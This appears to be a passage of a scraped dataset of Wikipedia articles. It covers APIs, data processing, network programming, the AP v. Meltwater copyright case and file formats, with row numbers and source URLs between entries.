popularity of microservices, which are loosely coupled services accessed through public APIs. 3 APIs should be versioned. There are two common versioning strategies: 4 In building applications, an API simplifies programming by abstracting the underlying implementation and only exposing objects or actions the developer needs. While a graphical interface for an email client might provide a user with a button that performs all the steps for fetching and highlighting new emails, an API for file input output might give the developer a function that copies a file from one location to another without requiring that the developer understand the file system operations occurring behind the scenes. 5 The term API initially described an interface only for end-user-facing programs, known as application programs. This origin is still reflected in the name "application programming interface. Today, the term is broader, including also utility software and even hardware interfaces. 7 The idea of the API is much older than the term itself. British computer scientists Maurice Wilkes and David Wheeler worked on a modular software library in the 1940s for EDSAC, an early computer. The subroutines in this library were stored on punched paper tape organized in a filing cabinet. This cabinet also contained what Wilkes and Wheeler called a "library catalog" of notes about each subroutine and how to incorporate it into a program. Today, such a catalog would be called an API (or an API specification or API documentation) because it instructs a programmer on how to use (or "call") each subroutine that the programmer needs. 7 Wilkes and Wheeler's 1951 book The Preparation of Programs for an Electronic Digital Computer contains the first published API specification. Joshua Bloch considers that Wilkes and Wheeler "latently invented" the API because it is more of a concept that is discovered than invented. 7 The term "application program interface" (without an ing suffix) is first recorded in a paper called Data structures and techniques for remote computer graphics presented at an AFIPS conference in 1968. 9 7 The authors of this paper use the term to describe the interaction of an application—a graphics program in this case—with the rest of the computer system. A consistent application interface (consisting of Fortran subroutine calls) was intended to free the programmer from dealing with idiosyncrasies of the graphics display device, and to provide hardware independence if the computer or the display were replaced. 8 The term was introduced to the field of databases by C. J. Date 10 in a 1974 paper called The Relational and Network Approaches: Comparison of the Application Programming Interface. 11 An API became a part of the ANSI SPARC framework for database management systems. This framework treated the application programming interface separately from other interfaces, such as the query interface. Database professionals in the 1970s observed these different interfaces could be combined; a sufficiently rich application interface could support the other interfaces as well. 6 This observation led to APIs that supported all types of programming, not just application programming. By 1990, the API was defined simply as "a set of services available to a programmer for performing certain tasks" by technologist Carl Malamud. 12 The idea of the API was expanded again with the dawn of remote procedure calls and web APIs. As computer networks became common in the 1970s and 1980s, programmers wanted to call libraries located not only on their local computers but on computers located elsewhere. These remote procedure calls were well supported by the Java language in particular. In the 1990s, with the spread of the internet, standards like CORBA, COM, and DCOM competed to become the most common way to expose API services. 13 Roy Fielding's dissertation Architectural Styles and the Design of Network-based Software Architectures at UC Irvine in 2000 outlined Representational state transfer (REST) and described the idea of a "network-based Application Programming Interface" that Fielding contrasted with traditional "library-based" APIs. 14 XML and JSON web APIs saw widespread commercial adoption beginning in 2000 and continuing as of 2022. The web API is now the most common meaning of the term API. 2 The Semantic Web proposed by Tim Berners-Lee in 2001 included "semantic APIs" that recasts the API as an open, distributed data interface rather than a software behavior interface. 15 Proprietary interfaces and agents became more widespread than open ones, but the idea of the API as a data interface took hold. Because web APIs are widely used to exchange data of all kinds online, API has become a broad term describing much of the communication on the internet. 13 When used in this way, the term API has overlap in meaning with the term communication protocol. The interface to a software library is one type of API. The API describes and prescribes the "expected behavior" (a specification) while the library is an "actual implementation" of this set of rules. A single API can have multiple implementations (or none, being abstract) in the form of different libraries that share the same programming interface. The separation of the API from its implementation can allow programs written in one language to use a library written in another. For example, because Scala and Java compile to compatible bytecode, Scala developers can take advantage of any Java API. 16 API use can vary depending on the type of programming language involved. An API for a procedural language such as Lua could consist primarily of basic routines to execute code, manipulate data or handle errors while an API for an object-oriented language, such as Java, would provide a specification of classes and its class methods. 17 18 Hyrum's law states that "With a sufficient number of users of an API, it does not matter what you promise in the contract: all observable behaviors of your system will be depended on by somebody. 19 Meanwhile, several studies show that most applications that use an API tend to use a small part of the API. 20 Language bindings are also APIs. By mapping the features and capabilities of one language to an interface implemented in another language, a language binding allows a library or service written in one language to be used when developing in another language. citation needed Tools such as SWIG and F2PY, a Fortran-to-Python interface generator, facilitate the creation of such interfaces. 21 An API can also be related to a software framework: a framework can be based on several libraries implementing several APIs, but unlike the normal use of an API, the access to the behavior built into the framework is mediated by extending its content with new classes plugged into the framework itself. Moreover, the overall program flow of control can be out of the control of the caller and in the framework's hands by inversion of control or a similar mechanism. 22 23 An API can specify the interface between an application and the operating system. 24 POSIX, for example, provides a set of common API specifications that aim to enable an application written for a POSIX conformant operating system to be compiled for another POSIX conformant operating system. Linux and Berkeley Software Distribution are examples of operating systems that implement the POSIX APIs. 25 Microsoft has shown a strong commitment to a backward-compatible API, particularly within its Windows API (Win32) library, so older applications may run on newer versions of Windows using an executable-specific setting called "Compatibility Mode". 26 An API differs from an application binary interface (ABI) in that an API is source code based while an ABI is binary based. For instance, POSIX provides APIs while the Linux Standard Base provides an ABI. 27 28 Remote APIs allow developers to manipulate remote resources through protocols, specific standards for communication that allow different technologies to work together, regardless of language or platform. For example, the Java Database Connectivity API allows developers to query many different types of databases with the same set of functions, while the Java remote method invocation API uses the Java Remote Method Protocol to allow invocation of functions that operate remotely but appear local to the developer. 29 30 Therefore, remote APIs are useful in maintaining the object abstraction in object-oriented programming; a method call, executed locally on a proxy object, invokes the corresponding method on the remote object, using the remoting protocol, and acquires the result to be used locally as a return value. A modification of the proxy object will also result in a corresponding modification of the remote object. 31 Web APIs are a service accessed from client devices (mobile phones, laptops, etc.) to a web server using the Hypertext Transfer Protocol (HTTP). Client devices send a request in the form of an HTTP request, and are met with a response message usually in JavaScript Object Notation (JSON) or Extensible Markup Language (XML) format. Developers typically use Web APIs to query a server for a specific set of data from that server. An example might be a shipping company API that can be added to an eCommerce-focused website to facilitate ordering shipping services and automatically include current shipping rates, without the site developer having to enter the shipper's rate table into a web database. While "web API" historically has been virtually synonymous with web service, the recent trend (so-called Web 2.0) has been moving away from Simple Object Access Protocol (SOAP) based web services and service-oriented architecture (SOA) towards more direct representational state transfer (REST) style web resources and resource-oriented architecture (ROA). 32 Part of this trend is related to the Semantic Web movement toward Resource Description Framework (RDF), a concept to promote web-based ontology engineering technologies. Web APIs allow the combination of multiple APIs into new applications known as mashups. 33 In the social media space, web APIs have allowed web communities to facilitate sharing content and data between communities and applications. In this way, content that is created in one place dynamically can be posted and updated to multiple locations on the web. 34 For example, Twitter's REST API allows developers to access core Twitter data and the Search API provides methods for developers to interact with Twitter Search and trends data. 35 The design of an API has a significant impact on its usage. 5 First of all, the design of programming interfaces represents an important part of software architecture, the organization of a complex piece of software. 36 The principle of information hiding describes the role of programming interfaces as enabling modular programming by hiding the implementation details of the modules so that users of modules need not understand the complexities inside the modules. 37 Aside from the previous underlying principle, other metrics for measuring the usability of an API may include properties such as functional efficiency, overall correctness, and learnability for novices. 38 One straightforward and commonly adopted way of designing APIs is to follow Nielsen's heuristic evaluation guidelines. The Factory method pattern is also typical in designing APIs due to their reusable nature. 39 Thus, the design of an API attempts to provide only the tools a user would expect. 5 An application programming interface can be synchronous or asynchronous. A synchronous API call is a design pattern where the call site is blocked while waiting for the called code to finish. 40 With an asynchronous API call, however, the call site is not blocked while waiting for the called code to finish, and instead the calling thread is notified when the reply arrives. API security is very critical when developing a public facing API. Common threats include SQL injection, Denial-of-service attack (DoS), broken authentication, and exposing sensitive data. 41 Without ensuring proper security practices, bad actors can get access to information they should not have or even gain privileges to make changes to your server. Some common security practices include proper connection security using HTTPS, content security to mitigate data injection attacks, and requiring an API key to use your service. 42 Many public facing API services require you to use an assigned API key, and will refuse to serve data without sending the key with your request. 43 APIs are one of the more common ways technology companies integrate. Those that provide and use APIs are considered as being members of a business ecosystem. 44 The main policies for releasing an API are: 45 An important factor when an API becomes public is its "interface stability". Changes to the API—for example adding new parameters to a function call—could break compatibility with the clients that depend on that API. 49 When parts of a publicly presented API are subject to change and thus not stable, such parts of a particular API should be documented explicitly as "unstable". For example, in the Google Guava library, the parts that are considered unstable, and that might change soon, are marked with the Java annotation Beta. 50 A public API can sometimes declare parts of itself as deprecated or rescinded. This usually means that part of the API should be considered a candidate for being removed, or modified in a backward incompatible way. Therefore, these changes allow developers to transition away from parts of the API that will be removed or not supported in the future. 51 On February 19, 2020, Akamai published their annual "State of the Internet" report, showcasing the growing trend of cybercriminals targeting public API platforms at financial services worldwide. From December 2017 through November 2019, Akamai witnessed 85.42 billion credential violation attacks. About 20%, or 16.55 billion, were against hostnames defined as API endpoints. Of these, 473.5 million have targeted financial services sector organizations. 52 API documentation describes the services an API offers and how to use those services, aiming to cover everything a client would need to know for practical purposes. Documentation is crucial for the development and maintenance of applications using the API. 53 API documentation is traditionally found in documentation files but can also be found in social media such as blogs, forums, and Q A websites. 54 Traditional documentation files are often presented via a documentation system, such as Javadoc or Pydoc, that has a consistent appearance and structure. However, the types of content included in the documentation differ from API to API. 55 In the interest of clarity, API documentation may include a description of classes and methods in the API as well as "typical usage scenarios, code snippets, design rationales, performance discussions, and contracts", but implementation details of the API services themselves are usually omitted. Reference documentation for a REST API can be generated automatically from an OpenAPI document, which is a machine-readable text file that uses a prescribed format and syntax defined in the OpenAPI Specification. The OpenAPI document defines basic information such as the API's name and description, as well as describing operations the API provides access to. 56 API documentation can be enriched with metadata information like Java annotations. This metadata can be used by the compiler, tools, and by the run-time environment to implement custom behaviors or custom handling. 57 In 2010, Oracle Corporation sued Google for having distributed a new implementation of Java embedded in the Android operating system. 58 Google had not acquired any permission to reproduce the Java API, although permission had been given to the similar OpenJDK project. Google had approached Oracle to negotiate a license for their API, but were turned down due to trust issues. Despite the disagreement, Google chose to use Oracle's code anyway. Judge William Alsup ruled in the Oracle v. Google case that APIs cannot be copyrighted in the U.S and that a victory for Oracle would have widely expanded copyright protection to a "functional set of symbols" and allowed the copyrighting of simple software commands: To accept Oracle's claim would be to allow anyone to copyright one version of code to carry out a system of commands and thereby bar all others from writing its different versions to carry out all or part of the same commands. 59 60 Alsup's ruling was overturned in 2014 on appeal to the Court of Appeals for the Federal Circuit, though the question of whether such use of APIs constitutes fair use was left unresolved. 61 62 In 2016, following a two-week trial, a jury determined that Google's reimplementation of the Java API constituted fair use, but Oracle vowed to appeal the decision. 63 Oracle won on its appeal, with the Court of Appeals for the Federal Circuit ruling that Google's use of the APIs did not qualify for fair use. 64 In 2019, Google appealed to the Supreme Court of the United States over both the copyrightability and fair use rulings, and the Supreme Court granted review. 65 Due to the COVID 19 pandemic, the oral hearings in the case were delayed until October 2020. 66 The case was decided by the Supreme Court in Google's favor with a ruling of 6 2. Justice Stephen Breyer delivered the opinion of the court and at one point mentioned that "The declaring code is, if copyrightable at all, further than are most computer programs from the core of copyright. This means the code used in APIs are more similar to dictionaries than novels in terms of copyright protection. 67 |
554 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_processing | Data processing is the collection and manipulation of digital data to produce meaningful information. 1 Data processing is a form of information processing, which is the modification (processing) of information in any manner detectable by an observer. note 1 Data processing may involve various processes, including: The United States Census Bureau history illustrates the evolution of data processing from manual through electronic procedures. Although widespread use of the term data processing dates only from the 1950s, 2 data processing functions have been performed manually for millennia. For example, bookkeeping involves functions such as posting transactions and producing reports like the balance sheet and the cash flow statement. Completely manual methods were augmented by the application of mechanical or electronic calculators. A person whose job was to perform calculations manually or using a calculator was called a "computer. The 1890 United States Census schedule was the first to gather data by individual rather than household. A number of questions could be answered by making a check in the appropriate box on the form. From 1850 to 1880 the Census Bureau employed "a system of tallying, which, by reason of the increasing number of combinations of classifications required, became increasingly complex. Only a limited number of combinations could be recorded in one tally, so it was necessary to handle the schedules 5 or 6 times, for as many independent tallies. 3 "It took over 7 years to publish the results of the 1880 census" 4 using manual processing methods. The term automatic data processing was applied to operations performed by means of unit record equipment, such as Herman Hollerith's application of punched card equipment for the 1890 United States Census. "Using Hollerith's punchcard equipment, the Census Office was able to complete tabulating most of the 1890 census data in 2 to 3 years, compared with 7 to 8 years for the 1880 census. It is estimated that using Hollerith's system saved some $5 million in processing costs" 4 in 1890 dollars even though there were twice as many questions as in 1880. Computerized data processing, or electronic data processing represents a later development, with a computer used instead of several independent pieces of equipment. The Census Bureau first made limited use of electronic computers for the 1950 United States Census, using a UNIVAC I system, 3 delivered in 1952. The term data processing has mostly been subsumed by the more general term information technology (IT). 5 The older term "data processing" is suggestive of older technologies. For example, in 1996 the Data Processing Management Association (DPMA) changed its name to the Association of Information Technology Professionals. Nevertheless, the terms are approximately synonymous. Commercial data processing involves a large volume of input data, relatively few computational operations, and a large volume of output. For example, an insurance company needs to keep records on tens or hundreds of thousands of policies, print and mail bills, and receive and post payments. In science and engineering, the terms data processing and information systems are considered too broad, and the term data processing is typically used for the initial stage followed by a data analysis in the second stage of the overall data handling. Data analysis uses specialized algorithms and statistical calculations that are less often observed in a typical general business environment. For data analysis, software suites like SPSS or SAS, or their free counterparts such as DAP, gretl, or PSPP are often used. These tools are usually helpful for processing various huge data sets, as they are able to handle enormous amount of statistical analysis. 6 A data processing system is a combination of machines, people, and processes that for a set of inputs produces a defined set of outputs. The inputs and outputs are interpreted as data, facts, information etc. depending on the interpreter's relation to the system. A term commonly used synonymously with data or storage (codes) processing system is information system. 7 With regard particularly to electronic data processing, the corresponding concept is referred to as electronic data processing system. A very simple example of a data processing system is the process of maintaining a check register. Transactions— checks and deposits— are recorded as they occur and the transactions are summarized to determine a current balance. Monthly the data recorded in the register is reconciled with a hopefully identical list of transactions processed by the bank. A more sophisticated record keeping system might further identify the transactions— for example deposits by source or checks by type, such as charitable contributions. This information might be used to obtain information like the total of all contributions for the year. The important thing about this example is that it is a system, in which, all transactions are recorded consistently, and the same method of bank reconciliation is used each time. This is a flowchart of a data processing system combining manual and computerized processing to handle accounts receivable, billing, and general ledger |
555 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Socket_programming | Computer network programming involves writing computer programs that enable processes to communicate with each other across a computer network. 1 Very generally, most of communications can be divided into connection-oriented, and connectionless. Whether a communication is connection-oriented or connectionless, is defined by the communication protocol, and not by application programming interface (API). Examples of the connection-oriented protocols include Transmission Control Protocol (TCP) and Sequenced Packet Exchange (SPX), and examples of connectionless protocols include User Datagram Protocol (UDP), "raw IP", and Internetwork Packet Exchange (IPX). For connection-oriented communications, communication parties usually have different roles. One party is usually waiting for incoming connections; this party is usually referred to as "server". Another party is the one which initiates connection; this party is usually referred to as "client". For connectionless communications, one party ("server") is usually waiting for an incoming packet, and another party ("client") is usually understood as the one which sends an unsolicited packet to "server". Network programming traditionally covers different layers of OSI ISO model (most of application-level programming belongs to L4 and up). The table below contains some examples of popular protocols belonging to different OSI ISO layers, and popular APIs for them. |
556 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Associated_Press_v._Meltwater_U.S._Holdings,_Inc. | Associated Press v. Meltwater U.S. Holdings, Inc. (S.D.N.Y. March 21, 2013) was a district court case in which the Associated Press (AP) brought suit against Meltwater Group in U.S. (Meltwater) for clipping and sharing news items under copyright infringement and "hot news" misappropriation under New York common law. In a cross-motion for summary judgement, Meltwater argued they were not infringing under the requirements of fair use. Meltwater claimed that their service was transformative and therefore non-infringing on copyright. The court held that Meltwater's copying was not protected under the fair use doctrine and it was infringing on AP's copyright. 1 A parallel case filed on the same grounds in the UK, however, was decided the other way in 2013 (in favor of Meltwater and against the equivalent newspaper licensing business) by the UK Supreme Court, subject to questions referred to the European Court of Justice and intended to clarify matters of a cross-border nature. The Associated Press (AP) was founded in 1846 as a not-for-profit news organization that published original content and photographs. The company received its funds from various subscribing newspaper and broadcasting companies. Licensing fees accounted for hundreds of millions of dollars in annual revenue for the Associated Press, and each contract was crafted to grant specific permissions of redistribution, clipping, etc. to each license holder. Each article was carefully sourced, researched, and edited. In addition, each article contained a lede, a concise concentration of key information, which "takes significant journalistic skill to craft. 1 The Associated Press obtained a registered copyright on some of their articles, thirty-three of which were identified to be relevant to this case (Registered Articles). In addition to licensing, AP offered numerous products including "AP Exchange, which allowed licensees to access content by searching for keywords and other metadata. 2 Meltwater was a "software as a service" or SaaS company, that in 2005 began offering news monitoring services to subscribers. 1 Meltwater electronically clipped articles and their contents verbatim using crawlers for its customers and distributes them widely. 3 The service eventually began to include stories written by AP. Meltwater's "Global Media Monitoring" product allowed its customers to search news articles by keyword. When a customer searched for information based on a string of keywords in the database, Meltwater reported back a list of articles from all over the web organized according to that query. Beneath the search result was a set of information including the headline of the article and URL, the information about the source and origin, and excerpts from that article. Subscribers to Meltwater were able to subscribe to a newsletter for their queries, searched ad hoc and archived the material if desired, etc. 1 AP and Meltwater competed for the news clipping service market for their clients through AP Exchange and Global Media Monitoring. It was not contested that through the Global Media Monitoring service, Meltwater copied content from each of the thirty-three articles registered under copyright by AP. 1 AP filed suit on 14 February 2012 on six forms of copyright infringement and hot news misappropriation, and Meltwater responded with four defense claims surrounding fair use and tortious interference with business relations. The pretrial was held 20 April 2012 and the right to initial investigation was granted. On 13 July 2012, AP added more articles to their complaint. On 9 November 2012, AP and Meltwater both filed for summary judgment, and the final motions were submitted 23 January 2013. The court decided on 21 March 2013. 1 AP asserted to the court that it held a valid copyright and Meltwater made use of the registered articles. Meltwater insisted that its use was fair. While there was no conversation or transacting with AP over Meltwater's use of their material, Meltwater claimed that their software service acted like a search engine, creating the justification for an implied license. Meltwater also accused AP of estoppel because they took insufficient measures to prevent Meltwater from proceeding with their text scraping business. 1 The court first established that the Associated Press owned a valid copyright for the articles in question and that Meltwater copied original elements of the articles. 1 Although federal copyright law does not cover the reporting of facts, the compilation of facts is protected (due to precedent set forth by Nihon Keizai Shimbun, Inc. v. Comline Business Data, Inc.). Therefore, the Associated Press owned a valid copyright over its news articles. Furthermore, Meltwater did not deny that it used automated crawlers to scrape the Associated Press's articles for its news aggregation services and programs. The opinion of the District Judge, Denise Cote, stated that Meltwater did violate AP's copyright by clipping and redistributing its articles without the appropriate licenses. 1 4 The court found that Meltwater failed to justify its fair use claim under 17 U.S.C. 107. Under 17 U.S.C. 107, Meltwater failed to satisfy the four criteria for a fair use defense: 1 The court also held that while other news services who delivered AP's stories licensed from AP, Meltwater did not license the content from the AP. Then, according to the court's holding, Meltwater did not have the right to an implied license as they claimed in court. For one, AP made licensing their articles their main point of cash flow, so to grant a license to a non-paying party did not fall under AP's business model. 1 Although Meltwater had vowed to appeal, both the Associated Press and Meltwater dismissed all claims and counterclaims in July 2013. After the litigation, the Associated Press and Meltwater partnered to develop new products whose aim would be to benefit both companies. 3 4 Associated Press v. Meltwater has provided legal solutions for the news industry to maintain their ability to license to news aggregators. 5 The news industry has claimed to have lost much revenue due to news aggregators that circumvent licensing fees. These news aggregators prevent a significant portion of the news industry's audience from viewing ads on the original content. However, other critics contest that the fair use defense could still be applied to news articles under different circumstances. 6 These other critics suggest that some news aggregators could provide a different function and promote public dialogue amongst news readers. Public Relations Consultants Association (PRCA) v The Newspaper Licensing Agency (NLA) was a 2011 case UK Supreme Court case decided in 2013, 7 essentially on the same issue (Meltwater's media clippings shown to clients online) and with the same defendant, Meltwater Group. The plaintiff differed, being a UK copyright collection society rather than AP, but upon parallel grounds. The case was decided by UK and European law rather than the fair use doctrine, as the latter is only a US legal principle. The UK case, initially decided by lower courts in favour of the NLA at the initial case and appeal, was overturned by the UK Supreme Court, who ruled Meltwater's activities legal, subject to certain questions referred to the European Court of Justice and intended to clarify matters of a cross-border nature. The rationale was that viewing of copyright works was not, and had never been, illegal in either the UK or European law, 7 : item 36 and Article 5.1 of the European Directive Directive 2001 29 EC (which covers "temporary copies" 7 : item 9, 11 ) permitted automated copying of a temporary nature for a lawful purpose. As mere viewing by Meltwater's clients was lawful under UK and EU law, the technical creation of cached copies to enable and facilitate this were also lawful. 7 : item 16 17 |
557 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:About | Wikipedia is a free online encyclopedia that anyone can edit, and millions already have. Wikipedia's purpose is to benefit readers by presenting information on all branches of knowledge. Hosted by the Wikimedia Foundation, it consists of freely editable content, whose articles also have numerous links to guide readers towards more information. Written collaboratively by largely anonymous volunteers known as Wikipedians, Wikipedia articles can be edited by anyone with Internet access, except in limited cases where editing is restricted to prevent disruption or vandalism. Since its creation on January 15, 2001, it has grown into the world's largest reference website, attracting over a billion visitors monthly. Wikipedia currently has more than sixty-three million articles in more than 300 languages, including 6,868,487 articles in English, with 113,813 active contributors in the past month. Wikipedia's fundamental principles are summarized in its five pillars. The Wikipedia community has developed many policies and guidelines, although editors do not need to be familiar with them before contributing. Anyone can edit Wikipedia's text, references, and images. What is written is more important than who writes it. The content must conform with Wikipedia's policies, including being verifiable by published sources. Editors' opinions, beliefs, personal experiences, unreviewed research, libelous material, and copyright violations will not remain. Wikipedia's software allows easy reversal of errors, and experienced editors watch and patrol bad edits. Wikipedia differs from printed references in important ways. It is continually created and updated, and encyclopedic articles on new events appear within minutes rather than months or years. Because anyone can improve Wikipedia, it has become more comprehensive than any other encyclopedia. Its contributors enhance its articles' quality and quantity, and remove misinformation, errors and vandalism. Any reader can fix a mistake or add more information to what has already been written (see Researching with Wikipedia). Begin by simply clicking the Edit or Edit source buttons or the pencil icon at the top of any non-protected page or section. Wikipedia has tested the wisdom of the crowd since 2001 and found that it succeeds. |
558 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File_format | A file format is a standard way that information is encoded for storage in a computer file. It specifies how bits are used to encode information in a digital storage medium. File formats may be either proprietary or free. Some file formats are designed for very particular types of data: PNG files, for example, store bitmapped images using lossless data compression. Other file formats, however, are designed for storage of several different types of data: the Ogg format can act as a container for different types of multimedia including any combination of audio and video, with or without text (such as subtitles), and metadata. A text file can contain any stream of characters, including possible control characters, and is encoded in one of various character encoding schemes. Some file formats, such as HTML, scalable vector graphics, and the source code of computer software are text files with defined syntaxes that allow them to be used for specific purposes. File formats often have a published specification describing the encoding method and enabling testing of program intended functionality. Not all formats have freely available specification documents, partly because some developers view their specification documents as trade secrets, and partly because other developers never author a formal specification document, letting precedent set by other already existing programs that use the format define the format via how these existing programs use it. If the developer of a format does not publish free specifications, another developer looking to utilize that kind of file must either reverse engineer the file to find out how to read it or acquire the specification document from the format's developers for a fee and by signing a non-disclosure agreement. The latter approach is possible only when a formal specification document exists. Both strategies require significant time, money, or both; therefore, file formats with publicly available specifications tend to be supported by more programs. Patent law, rather than copyright, is more often used to protect a file format. Although patents for file formats are not directly permitted under US law, some formats encode data using patented algorithms. For example, prior to 2004, using compression with the GIF file format required the use of a patented algorithm, and though the patent owner did not initially enforce their patent, they later began collecting royalty fees. This has resulted in a significant decrease in the use of GIFs, and is partly responsible for the development of the alternative PNG format. However, the GIF patent expired in the US in mid 2003, and worldwide in mid 2004. Different operating systems have traditionally taken different approaches to determining a particular file's format, with each approach having its own advantages and disadvantages. Most modern operating systems and individual applications need to use all of the following approaches to read "foreign" file formats, if not work with them completely. One popular method used by many operating systems, including Windows, macOS, CP M, DOS, VMS, and VM CMS, is to determine the format of a file based on the end of its name, more specifically the letters following the final period. This portion of the filename is known as the filename extension. For example, HTML documents are identified by names that end with .html (or .htm), and GIF images by .gif. In the original FAT file system, file names were limited to an eight-character identifier and a three-character extension, known as an 8.3 filename. There are a limited number of three-letter extensions, which can cause a given extension to be used by more than one program. Many formats still use three-character extensions even though modern operating systems and application programs no longer have this limitation. Since there is no standard list of extensions, more than one format can use the same extension, which can confuse both the operating system and users. One artifact of this approach is that the system can easily be tricked into treating a file as a different format simply by renaming it — an HTML file can, for instance, be easily treated as plain text by renaming it from filename.html to filename.txt. Although this strategy was useful to expert users who could easily understand and manipulate this information, it was often confusing to less technical users, who could accidentally make a file unusable (or "lose" it) by renaming it incorrectly. This led most versions of Windows and Mac OS to hide the extension when listing files. This prevents the user from accidentally changing the file type, and allows expert users to turn this feature off and display the extensions. Hiding the extension, however, can create the appearance of two or more identical filenames in the same folder. For example, a company logo may be needed both in .eps format (for publishing) and .png format (for web sites). With the extensions visible, these would appear as the unique filenames: "CompanyLogo.eps" and "CompanyLogo.png". On the other hand, hiding the extensions would make both appear as "CompanyLogo", which can lead to confusion. Hiding extensions can also pose a security risk. 1 For example, a malicious user could create an executable program with an innocent name such as "Holiday photo.jpg.exe". The .exe" would be hidden and an unsuspecting user would see "Holiday photo.jpg", which would appear to be a JPEG image, usually unable to harm the machine. However, the operating system would still see the .exe" extension and run the program, which would then be able to cause harm to the computer. The same is true with files with only one extension: as it is not shown to the user, no information about the file can be deduced without explicitly investigating the file. To further trick users, it is possible to store an icon inside the program, in which case some operating systems' icon assignment for the executable file (.exe) would be overridden with an icon commonly used to represent JPEG images, making the program look like an image. Extensions can also be spoofed: some Microsoft Word macro viruses create a Word file in template format and save it with a .doc extension. Since Word generally ignores extensions and looks at the format of the file, these would open as templates, execute, and spread the virus. citation needed This represents a practical problem for Windows systems where extension-hiding is turned on by default. A second way to identify a file format is to use information regarding the format stored inside the file itself, either information meant for this purpose or binary strings that happen to always be in specific locations in files of some formats. Since the easiest place to locate them is at the beginning, such area is usually called a file header when it is greater than a few bytes, or a magic number if it is just a few bytes long. The metadata contained in a file header are usually stored at the start of the file, but might be present in other areas too, often including the end, depending on the file format or the type of data contained. Character-based (text) files usually have character-based headers, whereas binary formats usually have binary headers, although this is not a rule. Text-based file headers usually take up more space, but being human-readable, they can easily be examined by using simple software such as a text editor or a hexadecimal editor. As well as identifying the file format, file headers may contain metadata about the file and its contents. For example, most image files store information about image format, size, resolution and color space, and optionally authoring information such as who made the image, when and where it was made, what camera model and photographic settings were used (Exif), and so on. Such metadata may be used by software reading or interpreting the file during the loading process and afterwards. File headers may be used by an operating system to quickly gather information about a file without loading it all into memory, but doing so uses more of a computer's resources than reading directly from the directory information. For instance, when a graphic file manager has to display the contents of a folder, it must read the headers of many files before it can display the appropriate icons, but these will be located in different places on the storage medium thus taking longer to access. A folder containing many files with complex metadata such as thumbnail information may require considerable time before it can be displayed. If a header is binary hard-coded such that the header itself needs complex interpretation in order to be recognized, especially for metadata content protection's sake, there is a risk that the file format can be misinterpreted. It may even have been badly written at the source. This can result in corrupt metadata which, in extremely bad cases, might even render the file unreadable. clarification needed A more complex example of file headers are those used for wrapper (or container) file formats. One way to incorporate file type metadata, often associated with Unix and its derivatives, is to store a "magic number" inside the file itself. Originally, this term was used for a specific set of 2 byte identifiers at the beginnings of files, but since any binary sequence can be regarded as a number, any feature of a file format which uniquely distinguishes it can be used for identification. GIF images, for instance, always begin with the ASCII representation of either GIF87a or GIF89a, depending upon the standard to which they adhere. Many file types, especially plain-text files, are harder to spot by this method. HTML files, for example, might begin with the string html (which is not case sensitive), or an appropriate document type definition that starts with DOCTYPE html, or, for XHTML, the XML identifier, which begins with ?xml. The files can also begin with HTML comments, random text, or several empty lines, but still be usable HTML. The magic number approach offers better guarantees that the format will be identified correctly, and can often determine more precise information about the file. Since reasonably reliable "magic number" tests can be fairly complex, and each file must effectively be tested against every possibility in the magic database, this approach is relatively inefficient, especially for displaying large lists of files (in contrast, file name and metadata-based methods need to check only one piece of data, and match it against a sorted index). Also, data must be read from the file itself, increasing latency as opposed to metadata stored in the directory. Where file types do not lend themselves to recognition in this way, the system must fall back to metadata. It is, however, the best way for a program to check if the file it has been told to process is of the correct format: while the file's name or metadata may be altered independently of its content, failing a well-designed magic number test is a pretty sure sign that the file is either corrupt or of the wrong type. On the other hand, a valid magic number does not guarantee that the file is not corrupt or is of a correct type. So-called shebang lines in script files are a special case of magic numbers. Here, the magic number is human-readable text that identifies a specific command interpreter and options to be passed to the command interpreter. Another operating system using magic numbers is AmigaOS, where magic numbers were called "Magic Cookies" and were adopted as a standard system to recognize executables in Hunk executable file format and also to let single programs, tools and utilities deal automatically with their saved data files, or any other kind of file types when saving and loading data. This system was then enhanced with the Amiga standard Datatype recognition system. Another method was the FourCC method, originating in OSType on Macintosh, later adapted by Interchange File Format (IFF) and derivatives. A final way of storing the format of a file is to explicitly store information about the format in the file system, rather than within the file itself. This approach keeps the metadata separate from both the main data and the name, but is also less portable than either filename extensions or "magic numbers", since the format has to be converted from filesystem to filesystem. While this is also true to an extent with filename extensions— for instance, for compatibility with MS-DOS's three character limit— most forms of storage have a roughly equivalent definition of a file's data and name, but may have varying or no representation of further metadata. Note that zip files or archive files solve the problem of handling metadata. A utility program collects multiple files together along with metadata about each file and the folders directories they came from all within one new file (e.g. a zip file with extension .zip). The new file is also compressed and possibly encrypted, but now is transmissible as a single file across operating systems by FTP transmissions or sent by email as an attachment. At the destination, the single file received has to be unzipped by a compatible utility to be useful. The problems of handling metadata are solved this way using zip files or archive files. The Mac OS' Hierarchical File System stores codes for creator and type as part of the directory entry for each file. These codes are referred to as OSTypes. These codes could be any 4 byte sequence but were often selected so that the ASCII representation formed a sequence of meaningful characters, such as an abbreviation of the application's name or the developer's initials. For instance a HyperCard "stack" file has a creator of WILD (from Hypercard's previous name, "WildCard") and a type of STAK. The BBEdit text editor has a creator code of R ch referring to its original programmer, Rich Siegel. The type code specifies the format of the file, while the creator code specifies the default program to open it with when double-clicked by the user. For example, the user could have several text files all with the type code of TEXT, but each open in a different program, due to having differing creator codes. This feature was intended so that, for example, human-readable plain-text files could be opened in a general-purpose text editor, while programming or HTML code files would open in a specialized editor or IDE. However, this feature was often the source of user confusion, as which program would launch when the files were double-clicked was often unpredictable. RISC OS uses a similar system, consisting of a 12 bit number which can be looked up in a table of descriptions—e.g. the hexadecimal number FF5 is "aliased" to PoScript, representing a PostScript file. A Uniform Type Identifier (UTI) is a method used in macOS for uniquely identifying "typed" classes of entities, such as file formats. It was developed by Apple as a replacement for OSType (type creator codes). The UTI is a Core Foundation string, which uses a reverse-DNS string. Some common and standard types use a domain called public (e.g. public.png for a Portable Network Graphics image), while other domains can be used for third-party types (e.g. com.adobe.pdf for Portable Document Format). UTIs can be defined within a hierarchical structure, known as a conformance hierarchy. Thus, public.png conforms to a supertype of public.image, which itself conforms to a supertype of public.data. A UTI can exist in multiple hierarchies, which provides great flexibility. In addition to file formats, UTIs can also be used for other entities which can exist in macOS, including: In IBM OS VS through z OS, the VSAM catalog (prior to ICF catalogs) 